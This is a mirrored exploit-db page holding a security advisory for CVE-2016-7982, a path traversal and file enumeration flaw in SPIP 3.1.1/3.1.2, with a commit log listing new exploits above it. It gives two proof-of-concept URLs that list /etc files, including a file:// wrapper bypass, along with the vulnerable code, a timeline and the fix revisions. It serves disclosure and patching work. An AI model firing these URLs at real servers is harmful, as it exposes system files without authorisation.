bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/40596.txt
Offensive Security 07fdc778ee DB: 2016-10-21 
24 new exploits

NetAuctionHelp 4.1 - search.asp SQL Injection

Apple Mac OSX 10.4.11 2007-008 - i386_set_ldt System Call Local Arbitrary Code Execution
Microsoft Edge - Array.map Heap Overflow (MS16-119)

Microsoft Jet Database Engine - '.MDB' File Parsing Remote Buffer Overflow
Microsoft Edge - Array.join Info Leak (MS16-119)

Windows DeviceApi CMApi PiCMOpenDeviceKey - Arbitrary Registry Key Write Privilege Escalation (MS16-124)
Windows DeviceApi CMApi - PiCMOpenDeviceKey Arbitrary Registry Key Write Privilege Escalation (MS16-124)

HikVision Security Systems - Activex Buffer Overflow
Oracle Netbeans IDE 8.1 - Directory Traversal
MiCasa VeraLite - Remote Code Execution
Oracle BI Publisher 11.1.1.6.0 / 11.1.1.7.0 / 11.1.1.9.0 / 12.2.1.0.0 - XML External Entity Injection
Classifieds Rental Script - SQL Injection
SAP NetWeaver KERNEL 7.0 < 7.5 - Denial of Service
SAP Adaptive Server Enterprise  16 - Denial of Service
Event Calendar PHP 1.5 - SQL Injection
SPIP 3.1.2 Template Compiler/Composer - PHP Code Execution
SPIP 3.1.1 / 3.1.2 - File Enumeration / Path Traversal
SPIP 3.1.2 - Cross-Site Request Forgery
Windows win32k.sys - TTF Processing RCVT TrueType Instruction Handler Out-of-Bounds Read (MS16-120)
Windows win32k.sys - TTF Processing win32k!sbit_Embolden / win32k!ttfdCloseFontContext Use-After-Free (MS16-120)
Windows Kernel - Registry Hive Loading Negative RtlMoveMemory Size in nt!CmpCheckValueList (MS16-124)
Windows Kernel - Registry Hive Loading Relative Arbitrary Read in nt!RtlValidRelativeSecurityDescriptor (MS16-123)
Microsoft Edge - Function.apply Info Leak (MS16-119)
Microsoft Edge - Spread Operator Stack Overflow (MS16-119)
Windows Edge/IE - Isolated Private Namespace Insecure DACL Privilege Escalation (MS16-118)
Windows Edge/IE - Isolated Private Namespace Insecure Boundary Descriptor Privilege Escalation (MS16-118)
Windows - NtLoadKeyEx Read Only Hive Arbitrary File Write Privilege Escalation (MS16-124)
Hak5 WiFi Pineapple - Preconfiguration Command Injection (Metasploit)
OpenNMS - Java Object Unserialization Remote Code Execution (Metasploit)
2016-10-21 05:01:17 +00:00

95 lines
No EOL
3.3 KiB
Text
Executable file
Raw Blame History

## SPIP 3.1.1/3.1.2 File Enumeration / Path Traversal (CVE-2016-7982)
### Product Description
SPIP is a publishing system for the Internet, which put importance on collaborative working, multilingual environments and ease of use. It is free software, distributed under the GNU/GPL licence.
### Vulnerability Description
The `valider_xml` file can be used to enumerate files on the system.
**Access Vector**: remote
**Security Risk**: medium
**Vulnerability**: CWE-538
**CVSS Base Score**: 4.9 (Medium)
**CVE-ID**: CVE-2016-7982
### Proof of Concept
Enumerating `.ini` files inside `/etc` (SPIP 3.1.1) :
http://spip-dev.srv/ecrire/?exec=valider_xml&var_url=/etc&ext=ini&recur=2
Bypassing SPIP 3.1.2 protection using PHP Wrappers :
http://spip-dev.srv/ecrire/?exec=valider_xml&var_url=file:///etc&ext=ini&recur=2
### Vulnerable code
if (is_dir($url)) {
$dir = (substr($url, -1, 1) === '/') ? $url : "$url/";
$ext = !preg_match('/^[.*\w]+$/', $req_ext) ? 'php' : $req_ext;
$files = preg_files($dir, "$ext$", $limit, $rec);
if (!$files and $ext !== 'html') {
$files = preg_files($dir, 'html$', $limit, $rec);
if ($files) {
$ext = 'html';
}
}
if ($files) {
$res = valider_dir($files, $ext, $url);
list($err, $res) = valider_resultats($res, $ext === 'html');
File names are stored in `$res` and displayed by `echo` on line 146 :
echo "<h1>", $titre, '<br>', $bandeau, '</h1>',
"<div style='text-align: center'>", $onfocus, "</div>",
$res,
fin_page();
### Timeline (dd/mm/yyyy)
* 15/09/2016 : Initial discovery
* 26/09/2016 : Contact with SPIP Team
* 27/09/2016 : Answer from SPIP Team, sent advisory details
* 27/09/2016 : Incorrect fixes for Path Traversal
* 27/09/2016 : New proof of concept for bypassing Path Traversal sent.
* 27/09/2016 : Bad fix for Path Traversal (23185)
* 28/09/2016 : New proof of concept for bypassing fixes for Path Traversal on Windows systems.
* 28/09/2016 : Fixes issued Path Traversal (23200)
* 30/09/2016 : SPIP 3.1.3 Released
### Fixes
* https://core.spip.net/projects/spip/repository/revisions/23207
* https://core.spip.net/projects/spip/repository/revisions/23208
* https://core.spip.net/projects/spip/repository/revisions/23206
* https://core.spip.net/projects/spip/repository/revisions/23202
* https://core.spip.net/projects/spip/repository/revisions/23201
* https://core.spip.net/projects/spip/repository/revisions/23200
* https://core.spip.net/projects/spip/repository/revisions/23191
* https://core.spip.net/projects/spip/repository/revisions/23190
* https://core.spip.net/projects/spip/repository/revisions/23193
* https://core.spip.net/projects/spip/repository/revisions/23188
* https://core.spip.net/projects/spip/repository/revisions/23187
* https://core.spip.net/projects/spip/repository/revisions/23185
* https://core.spip.net/projects/spip/repository/revisions/23182
* https://core.spip.net/projects/spip/repository/revisions/23184
### Affected versions
* Version <= 3.1.2
### Credits
* Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com)
-- SYSDREAM Labs <labs@sysdream.com> GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 * Website: https://sysdream.com/ * Twitter: @sysdream
Reference in a new issue View git blame Copy permalink